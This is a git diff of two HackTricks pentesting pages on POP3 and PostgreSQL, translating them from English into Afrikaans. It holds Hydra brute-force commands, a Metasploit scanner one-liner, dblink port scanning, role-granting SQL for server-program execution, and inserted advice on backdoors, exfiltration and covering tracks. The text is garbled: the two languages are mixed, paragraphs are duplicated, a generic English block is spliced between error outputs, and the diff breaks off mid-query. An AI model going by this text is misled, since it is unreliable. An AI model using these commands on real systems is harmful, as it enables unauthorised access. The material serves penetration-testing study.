"pop3-capabilities or pop3-ntlm-info" -sV -port #All are default scripts ``` - -The `pop3-ntlm-info` plugin will return some "**sensitive**" data (Windows versions). +Die `pop3-ntlm-info` invoegtoepassing sal sekere "**sensitiewe**" data (Windows-weergawes) teruggee. ### [POP3 bruteforce](../generic-methodologies-and-resources/brute-force.md#pop) -## POP syntax - -POP commands examples from [here](http://sunnyoasis.com/services/emailviatelnet.html) +## POP sintaksis +POP-opdragvoorbeelde van [hier](http://sunnyoasis.com/services/emailviatelnet.html) ```bash POP commands: - USER uid Log in as "uid" - PASS password Substitue "password" for your actual password - STAT List number of messages, total mailbox size - LIST List messages and sizes - RETR n Show message n - DELE n Mark message n for deletion - RSET Undo any changes - QUIT Logout (expunges messages if no RSET) - TOP msg n Show first n lines of message number msg - CAPA Get capabilities +USER uid Log in as "uid" +PASS password Substitue "password" for your actual password +STAT List number of messages, total mailbox size +LIST List messages and sizes +RETR n Show message n +DELE n Mark message n for deletion +RSET Undo any changes +QUIT Logout (expunges messages if no RSET) +TOP msg n Show first n lines of message number msg +CAPA Get capabilities +``` +### POP (Post Office Protocol) + +POP (Post Office Protocol) is a protocol used by email clients to retrieve email messages from a mail server. It is one of the most common protocols used for email retrieval. + +#### POP3 + +POP3 (Post Office Protocol version 3) is the most widely used version of POP. It operates on port 110 and uses a simple text-based protocol. + +##### Enumeration + +To enumerate users on a POP3 server, you can use the `USER` command followed by a username. If the server responds with an error message, it means that the user does not exist. If the server responds with a positive message, it means that the user exists. + +``` +USER ``` -Example: +##### Brute-Force Attack +To perform a brute-force attack on a POP3 server, you can use a tool like Hydra. Hydra is a powerful tool that can perform dictionary and brute-force attacks against various protocols, including POP3. + +``` +hydra -L -P -s -f pop3 +``` + +##### Password Spraying + +Password spraying is a technique used to bypass account lockouts by attempting a small number of commonly used passwords against multiple user accounts. This technique can be effective against POP3 servers that do not have account lockout policies in place. + +##### Exploiting Vulnerabilities + +There are several vulnerabilities that can be exploited in POP3 servers, such as buffer overflows, command injection, and format string vulnerabilities. Exploiting these vulnerabilities can allow an attacker to gain unauthorized access to the server or execute arbitrary code. + +#### POP3S + +POP3S (Secure POP3) is a secure version of POP3 that uses SSL/TLS encryption to secure the communication between the email client and the mail server. It operates on port 995. + +##### Enumeration + +The enumeration techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. + +``` +openssl s_client -connect : +``` + +##### Brute-Force Attack + +The brute-force attack techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. + +##### Password Spraying + +The password spraying techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. + +##### Exploiting Vulnerabilities + +The vulnerability exploitation techniques for POP3S are the same as for POP3. However, since POP3S uses SSL/TLS encryption, you will need to use a tool like `openssl` to establish a secure connection to the server. ``` root@kali:~# telnet $ip 110 - +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready - USER billydean - +OK - PASS password - +OK Welcome billydean ++OK beta POP3 server (JAMES POP3 Server 2.3.2) ready +USER billydean ++OK +PASS password ++OK Welcome billydean - list +list - +OK 2 1807 - 1 786 - 2 1021 ++OK 2 1807 +1 786 +2 1021 - retr 1 +retr 1 - +OK Message follows - From: jamesbrown@motown.com - Dear Billy Dean, ++OK Message follows +From: jamesbrown@motown.com +Dear Billy Dean, - Here is your login for remote desktop ... try not to forget it this time! - username: billydean - password: PA$$W0RD!Z +Here is your login for remote desktop ... try not to forget it this time! +username: billydean +password: PA$$W0RD!Z ``` +## Gevaarlike Instellings -## Dangerous Settings +Vanaf [https://academy.hackthebox.com/module/112/section/1073](https://academy.hackthebox.com/module/112/section/1073) -From [https://academy.hackthebox.com/module/112/section/1073](https://academy.hackthebox.com/module/112/section/1073) - -| **Setting** | **Description** | -| ------------------------- | ----------------------------------------------------------------------------------------- | -| `auth_debug` | Enables all authentication debug logging. | -| `auth_debug_passwords` | This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. | -| `auth_verbose` | Logs unsuccessful authentication attempts and their reasons. | -| `auth_verbose_passwords` | Passwords used for authentication are logged and can also be truncated. | -| `auth_anonymous_username` | This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. | - -## HackTricks Automatic Commands +| **Instelling** | **Beskrywing** | +| ------------------------- | ----------------------------------------------------------------------------------------------- | +| `auth_debug` | Stel alle verifikasie foutopsporingslogging in. | +| `auth_debug_passwords` | Hierdie instelling pas log-verdowwing toe, die ingedien wagwoorde en die skema word gelog. | +| `auth_verbose` | Log onsuksesvolle verifikasiepogings en hul redes. | +| `auth_verbose_passwords` | Wagwoorde wat vir verifikasie gebruik word, word gelog en kan ook afgekort word. | +| `auth_anonymous_username` | Dit spesifiseer die gebruikersnaam wat gebruik moet word wanneer daar met die ANONYMOUS SASL-meganisme ingeteken word. | +## HackTricks Outomatiese Opdragte ``` Protocol_Name: POP #Protocol Abbreviation if there is one. Port_Number: 110 #Comma separated if there is more than one. Protocol_Description: Post Office Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for POP - Note: | - Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version. +Name: Notes +Description: Notes for POP +Note: | +Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version. - https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop +https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop Entry_2: - Name: Banner Grab - Description: Banner Grab 110 - Command: nc -nv {IP} 110 +Name: Banner Grab +Description: Banner Grab 110 +Command: nc -nv {IP} 110 Entry_3: - Name: Banner Grab 995 - Description: Grab Banner Secure - Command: openssl s_client -connect {IP}:995 -crlf -quiet +Name: Banner Grab 995 +Description: Grab Banner Secure +Command: openssl s_client -connect {IP}:995 -crlf -quiet Entry_4: - Name: Nmap - Description: Scan for POP info - Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP} +Name: Nmap +Description: Scan for POP info +Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP} Entry_5: - Name: Hydra Brute Force - Description: Need User - Command: hydra -l {Username} -P {Big_Passwordlist} -f {IP} pop3 -V - -Entry_6: - Name: consolesless mfs enumeration - Description: POP3 enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {IP}; set RPORT 110; run; exit' - -``` +Name: Hydra Brute Force +Description: Need User +Command: hydra -l {Username} -P {Big_Passwordlist} -f {IP} pop3 -V +Entry_6: +Name: consolesless mfs enumeration +Description: POP3 enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {IP}; set RPORT 110; run; exit' + +```
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegramgroep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index a309f5c86..e0cc792f0 100644 --- a/network-services-pentesting/pentesting-postgresql.md +++ b/network-services-pentesting/pentesting-postgresql.md @@ -3,38 +3,58 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## **Basic Information** +## **Basiese Inligting** -**PostgreSQL** is described as an **object-relational database system** that is **open source**. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations. - -**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use. +**PostgreSQL** word beskryf as 'n **objek-verwantskaplike databasisstelsel** wat **oopbron** is. Hierdie stelsel maak nie net gebruik van die SQL-taal nie, maar verbeter dit ook met addisionele funksies. Sy vermoëns stel dit in staat om 'n wye verskeidenheid data-tipes en operasies te hanteer, wat dit 'n veelsydige keuse maak vir ontwikkelaars en organisasies. +**Verstekpoort:** 5432, en as hierdie poort reeds in gebruik is, lyk dit asof postgresql die volgende poort (waarskynlik 5433) sal gebruik wat nie in gebruik is nie. ``` PORT STATE SERVICE 5432/tcp open pgsql ``` +## Koppel & Basiese Enum -## Connect & Basic Enum +### Connect +Om te begin, moet jy 'n verbinding maak met die PostgreSQL-diens. Jy kan dit doen deur die `psql`-opdrag te gebruik: + +```bash +psql -h -p -U -d +``` + +Vervang `` met die IP-adres of die DNS-naam van die PostgreSQL-diens, `` met die poortnommer (standaard is 5432), `` met die gebruikersnaam en `` met die databasenaam. + +As jy suksesvol gekoppel het, sal jy 'n `psql`-opdraglyn sien wat aandui dat jy met die PostgreSQL-diens geassosieer is. + +### Basiese Enumerasie + +Nadat jy suksesvol gekoppel het, kan jy begin met basiese enumerasie van die PostgreSQL-diens. Hier is 'n paar nuttige opdragte: + +- `\l`: Lys alle databasisse in die PostgreSQL-diens. +- `\dt`: Lys alle tabelle in die huidige databasis. +- `\du`: Lys alle gebruikers in die PostgreSQL-diens. +- `\dp`: Lys die toegangsregte vir die tabelle in die huidige databasis. + +Hierdie opdragte sal jou help om 'n beter begrip van die PostgreSQL-diens te kry en om potensiële aanvalsoppervlaktes te identifiseer. ```bash psql -U # Open psql console with user psql -h -U -d # Remote connection @@ -74,101 +94,226 @@ SELECT * FROM pg_extension; # Get history of commands executed \s ``` - {% hint style="warning" %} -If running **`\list`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. +As jy **`\list`** uitvoer en 'n databasis met die naam **`rdsadmin`** vind, weet jy dat jy binne 'n **AWS postgresql databasis** is. {% endhint %} -For more information about **how to abuse a PostgreSQL database** check: +Vir meer inligting oor **hoe om 'n PostgreSQL databasis te misbruik**, kyk: {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %} [postgresql-injection](../pentesting-web/sql-injection/postgresql-injection/) {% endcontent-ref %} -## Automatic Enumeration - +## Outomatiese Enumerasie ``` msf> use auxiliary/scanner/postgres/postgres_version msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#postgresql) -### **Port scanning** - -According to [**this research**](https://www.exploit-db.com/papers/13084), when a connection attempt fails, `dblink` throws an `sqlclient_unable_to_establish_sqlconnection` exception including an explanation of the error. Examples of these details are listed below. +### **Poortskandering** +Volgens [**hierdie navorsing**](https://www.exploit-db.com/papers/13084), gooi `dblink` 'n `sqlclient_unable_to_establish_sqlconnection`-uitsondering wanneer 'n verbindingspoging misluk, met 'n verduideliking van die fout. Voorbeelde van hierdie besonderhede word hieronder gelys. ```sql SELECT * FROM dblink_connect('host=1.2.3.4 - port=5678 - user=name - password=secret - dbname=abc - connect_timeout=10'); +port=5678 +user=name +password=secret +dbname=abc +connect_timeout=10'); ``` +* Gasheer is af -* Host is down - -`DETAIL: could not connect to server: No route to host Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?` - -* Port is closed +`DETAIL: kon nie aan die bediener koppel: Geen roete na gasheer. Is die bediener aan die gang op gasheer "1.2.3.4" en aanvaar dit TCP/IP-koppelinge op poort 5678?` +* Poort is toe ``` DETAIL: could not connect to server: Connection refused Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` - -* Port is open - +* Poort is oop ``` DETAIL: server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request ``` +of -or +--- +### PostgreSQL + +#### Enumeration + +##### Version + +To obtain the version of the PostgreSQL server, you can use the following SQL query: + +```sql +SELECT version(); +``` + +##### List Databases + +To list all the databases in the PostgreSQL server, you can use the following SQL query: + +```sql +SELECT datname FROM pg_database; +``` + +##### List Users + +To list all the users in the PostgreSQL server, you can use the following SQL query: + +```sql +SELECT usename FROM pg_user; +``` + +##### List Tables + +To list all the tables in a specific database, you can use the following SQL query: + +```sql +SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'; +``` + +##### List Columns + +To list all the columns in a specific table, you can use the following SQL query: + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name'; +``` + +##### List Functions + +To list all the functions in a specific database, you can use the following SQL query: + +```sql +SELECT proname FROM pg_proc; +``` + +##### List Triggers + +To list all the triggers in a specific database, you can use the following SQL query: + +```sql +SELECT tgname FROM pg_trigger; +``` + +##### List Views + +To list all the views in a specific database, you can use the following SQL query: + +```sql +SELECT viewname FROM pg_views; +``` + +##### List Indexes + +To list all the indexes in a specific database, you can use the following SQL query: + +```sql +SELECT indexname FROM pg_indexes; +``` + +##### List Constraints + +To list all the constraints in a specific database, you can use the following SQL query: + +```sql +SELECT conname FROM pg_constraint; +``` + +##### List Extensions + +To list all the extensions in a specific database, you can use the following SQL query: + +```sql +SELECT extname FROM pg_extension; +``` + +#### Exploitation + +##### Default Credentials + +PostgreSQL does not have default credentials. However, it is common for users to set weak or easily guessable passwords. Therefore, it is recommended to perform password guessing attacks using tools like Hydra or Medusa. + +##### SQL Injection + +PostgreSQL is vulnerable to SQL injection attacks. You can exploit this vulnerability by injecting malicious SQL queries into user input fields or by manipulating the SQL queries sent to the server. + +##### Privilege Escalation + +To escalate privileges in PostgreSQL, you can try the following techniques: + +- Exploiting misconfigured permissions: Check if any user has excessive privileges or if there are any misconfigured roles. +- Exploiting vulnerabilities: Look for known vulnerabilities in the version of PostgreSQL being used. +- Exploiting weak passwords: Try to crack weak passwords or use password reuse attacks. + +##### Remote Code Execution + +To achieve remote code execution in PostgreSQL, you can try the following techniques: + +- Exploiting SQL injection vulnerabilities: Inject malicious SQL queries that execute arbitrary commands on the server. +- Exploiting command execution vulnerabilities: Look for vulnerabilities that allow executing commands on the underlying operating system. + +##### Data Exfiltration + +To exfiltrate data from a PostgreSQL server, you can use techniques such as: + +- Dumping the database: Use the `pg_dump` command to create a backup of the entire database. +- Extracting specific data: Write SQL queries to extract specific data from the database and save it to a file or send it to a remote server. + +##### Password Cracking + +If you have obtained a password hash from the PostgreSQL server, you can try to crack it using tools like John the Ripper or Hashcat. + +##### Post-Exploitation + +After gaining access to a PostgreSQL server, you can perform various post-exploitation activities, such as: + +- Privilege escalation: Look for ways to escalate privileges within the server or the underlying operating system. +- Persistence: Install backdoors or create new user accounts to maintain access to the server. +- Data manipulation: Modify or delete data in the database. +- Covering tracks: Delete logs or modify timestamps to hide your activities. ``` DETAIL: FATAL: password authentication failed for user "name" ``` - -* Port is open or filtered - +* Poort is oop of gefiltreer ``` DETAIL: could not connect to server: Connection timed out Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` +In PL/pgSQL funksies is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. As jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting herwin. As dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelys-aanvalsmetode te gebruik wat bespreek is in die vorige afdeling, aangesien dit moontlik positiewe resultate kan oplewer. -In PL/pgSQL functions, it is currently not possible to obtain exception details. However, if you have direct access to the PostgreSQL server, you can retrieve the necessary information. If extracting usernames and passwords from the system tables is not feasible, you may consider utilizing the wordlist attack method discussed in the preceding section, as it could potentially yield positive results. +## Opname van Voorregte -## Enumeration of Privileges +### Rolle -### Roles - -| Role Types | | +| Rol Tipes | | | -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- | -| rolsuper | Role has superuser privileges | -| rolinherit | Role automatically inherits privileges of roles it is a member of | -| rolcreaterole | Role can create more roles | -| rolcreatedb | Role can create databases | -| rolcanlogin | Role can log in. That is, this role can be given as the initial session authorization identifier | -| rolreplication | Role is a replication role. A replication role can initiate replication connections and create and drop replication slots. | -| rolconnlimit | For roles that can log in, this sets maximum number of concurrent connections this role can make. -1 means no limit. | -| rolpassword | Not the password (always reads as `********`) | -| rolvaliduntil | Password expiry time (only used for password authentication); null if no expiration | -| rolbypassrls | Role bypasses every row-level security policy, see [Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) for more information. | -| rolconfig | Role-specific defaults for run-time configuration variables | -| oid | ID of role | +| rolsuper | Rol het supergebruiker-voorregte | +| rolinherit | Rol erf outomaties voorregte van rolle waarvan dit 'n lid is | +| rolcreaterole | Rol kan meer rolle skep | +| rolcreatedb | Rol kan databasisse skep | +| rolcanlogin | Rol kan inteken. Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word | +| rolreplication | Rol is 'n replikasie-rol. 'n Replikasie-rol kan replikasieverbindinge inisieer en replikasiegleuwe skep en laat val | +| rolconnlimit | Vir rolle wat kan inteken, stel dit die maksimum aantal gelyktydige verbindings in wat hierdie rol kan maak. -1 beteken geen limiet nie | +| rolpassword | Nie die wagwoord (lees altyd as `********`) | +| rolvaliduntil | Wagwoord vervaltyd (slegs gebruik vir wagwoord-verifikasie); nul indien geen vervaltyd | +| rolbypassrls | Rol omseil elke ryvlak-sekuriteitsbeleid, sien [Afdeling 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) vir meer inligting. | +| rolconfig | Rol-spesifieke verstekwaardes vir uitvoertyd-konfigurasie-veranderlikes | +| oid | ID van rol | -#### Interesting Groups +#### Interessante Groepe -* If you are a member of **`pg_execute_server_program`** you can **execute** programs -* If you are a member of **`pg_read_server_files`** you can **read** files -* If you are a member of **`pg_write_server_files`** you can **write** files +* As jy 'n lid is van **`pg_execute_server_program`** kan jy **programme uitvoer** +* As jy 'n lid is van **`pg_read_server_files`** kan jy **lêers lees** +* As jy 'n lid is van **`pg_write_server_files`** kan jy **lêers skryf** {% hint style="info" %} -Note that in Postgres a **user**, a **group** and a **role** is the **same**. It just depend on **how you use it** and if you **allow it to login**. +Let daarop dat in Postgres 'n **gebruiker**, 'n **groep** en 'n **rol** dieselfde is. Dit hang net af van **hoe jy dit gebruik** en of jy dit toelaat om in te teken. {% endhint %} - ```sql # Get users roles \du @@ -176,21 +321,21 @@ Note that in Postgres a **user**, a **group** and a **role** is the **same**. It #Get users roles & groups # r.rolpassword # r.rolconfig, -SELECT - r.rolname, - r.rolsuper, - r.rolinherit, - r.rolcreaterole, - r.rolcreatedb, - r.rolcanlogin, - r.rolbypassrls, - r.rolconnlimit, - r.rolvaliduntil, - r.oid, - ARRAY(SELECT b.rolname - FROM pg_catalog.pg_auth_members m - JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid) - WHERE m.member = r.oid) as memberof +SELECT +r.rolname, +r.rolsuper, +r.rolinherit, +r.rolcreaterole, +r.rolcreatedb, +r.rolcanlogin, +r.rolbypassrls, +r.rolconnlimit, +r.rolvaliduntil, +r.oid, +ARRAY(SELECT b.rolname +FROM pg_catalog.pg_auth_members m +JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid) +WHERE m.member = r.oid) as memberof , r.rolreplication FROM pg_catalog.pg_roles r ORDER BY 1; @@ -204,7 +349,7 @@ SELECT current_setting('is_superuser'); GRANT pg_execute_server_program TO "username"; GRANT pg_read_server_files TO "username"; GRANT pg_write_server_files TO "username"; -## You will probably get this error: +## You will probably get this error: ## Cannot GRANT on the "pg_write_server_files" role without being a member of the role. # Create new role (user) as member of a role (group) @@ -212,9 +357,51 @@ CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files; ## Common error ## Cannot GRANT on the "pg_read_server_files" role without being a member of the role. ``` +### Tabelle -### Tables +In PostgreSQL, tables are used to store data in a structured manner. Each table consists of columns and rows, where columns represent the different attributes or fields of the data, and rows represent individual records or instances of the data. +To create a table in PostgreSQL, you can use the `CREATE TABLE` statement followed by the table name and the column definitions. The column definitions specify the name, data type, and any constraints for each column. + +Here is an example of creating a table called `users` with three columns: `id`, `name`, and `email`: + +```sql +CREATE TABLE users ( + id SERIAL PRIMARY KEY, + name VARCHAR(50) NOT NULL, + email VARCHAR(100) UNIQUE +); +``` + +In this example, the `id` column is defined as a `SERIAL` data type, which automatically generates a unique value for each new row. The `PRIMARY KEY` constraint ensures that the `id` column is unique and serves as the primary key for the table. + +The `name` column is defined as a `VARCHAR(50)` data type, which can store up to 50 characters. The `NOT NULL` constraint ensures that the `name` column cannot be empty. + +The `email` column is defined as a `VARCHAR(100)` data type and has a `UNIQUE` constraint, which ensures that each email address in the table is unique. + +Once the table is created, you can insert data into it using the `INSERT INTO` statement, query the data using the `SELECT` statement, update the data using the `UPDATE` statement, and delete the data using the `DELETE` statement. + +To view the structure of a table, you can use the `\d` command in the PostgreSQL command-line interface. For example, `\d users` will display the column names, data types, and constraints of the `users` table. + +```sql +\d users +``` + +This will show the following output: + +``` + Table "public.users" + Column | Type | Modifiers +--------+-----------------------+----------- + id | integer | not null + name | character varying(50) | not null + email | character varying(100)| +Indexes: + "users_pkey" PRIMARY KEY, btree (id) + "users_email_key" UNIQUE CONSTRAINT, btree (email) +``` + +This output provides information about the columns, their data types, and any constraints or indexes associated with the table. ```sql # Get owners of tables select schemaname,tablename,tableowner from pg_tables; @@ -228,9 +415,68 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro ## If nothing, you don't have any permission SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow'; ``` +### Funksies -### Functions +Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the `CREATE FUNCTION` statement and can be written in various programming languages such as SQL, PL/pgSQL, Python, etc. +Funksies in PostgreSQL is benoemde blokke kode wat uitgevoer kan word deur hul naam te roep. Hulle word gebruik om spesifieke take uit te voer en kan parameters aanvaar en waardes teruggee. Funksies kan geskep word deur die `CREATE FUNCTION` verklaring te gebruik en kan geskryf word in verskeie programmeer tale soos SQL, PL/pgSQL, Python, ens. + +#### Creating Functions + +#### Funksies Skep + +To create a function in PostgreSQL, you can use the `CREATE FUNCTION` statement followed by the function name, input parameters (if any), return type, and the code block enclosed in a `BEGIN` and `END` block. Here is the syntax: + +Om 'n funksie in PostgreSQL te skep, kan jy die `CREATE FUNCTION` verklaring gebruik gevolg deur die funksie naam, insetparameters (indien enige), terugkeer tipe, en die kodeblok wat ingesluit is in 'n `BEGIN` en `END` blok. Hier is die sintaksis: + +```sql +CREATE FUNCTION function_name (input_parameters) + RETURNS return_type + LANGUAGE language_name +AS $$ + -- Function code here +$$; +``` + +#### Calling Functions + +#### Funksies Roep + +Once a function is created, it can be called using the `SELECT` statement or as part of another SQL statement. To call a function, you need to specify the function name followed by the input parameters (if any) enclosed in parentheses. Here is an example: + +Sodra 'n funksie geskep is, kan dit geroep word deur die `SELECT` verklaring te gebruik of as deel van 'n ander SQL-verklaring. Om 'n funksie te roep, moet jy die funksie naam spesifiseer gevolg deur die insetparameters (indien enige) wat ingesluit is in hakies. Hier is 'n voorbeeld: + +```sql +SELECT function_name(input_parameters); +``` + +#### Returning Values + +#### Waardes Teruggee + +Functions in PostgreSQL can return values using the `RETURN` statement. The return type of the function should match the specified return type in the function definition. Here is an example of a function that returns an integer: + +Funksies in PostgreSQL kan waardes teruggee deur die `RETURN` verklaring te gebruik. Die terugkeer tipe van die funksie moet ooreenstem met die gespesifiseerde terugkeer tipe in die funksie definisie. Hier is 'n voorbeeld van 'n funksie wat 'n heelgetal teruggee: + +```sql +CREATE FUNCTION add_numbers(a integer, b integer) + RETURNS integer +AS $$ + BEGIN + RETURN a + b; + END; +$$; + +SELECT add_numbers(5, 10); -- Returns 15 +``` + +#### Conclusion + +#### Gevolgtrekking + +Functions in PostgreSQL are powerful tools that allow you to encapsulate reusable code and perform specific tasks. By creating and calling functions, you can enhance the functionality and flexibility of your PostgreSQL database. + +Funksies in PostgreSQL is kragtige hulpmiddels wat jou in staat stel om herbruikbare kode te inkapsuleer en spesifieke take uit te voer. Deur funksies te skep en te roep, kan jy die funksionaliteit en buigsaamheid van jou PostgreSQL databasis verbeter. ```sql # Interesting functions are inside pg_catalog \df * #Get all @@ -243,39 +489,33 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro # Get all functions of a schema (pg_catalog in this case) SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position FROM information_schema.routines - LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name +LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name WHERE routines.specific_schema='pg_catalog' ORDER BY routines.routine_name, parameters.ordinal_position; # Another aparent option SELECT * FROM 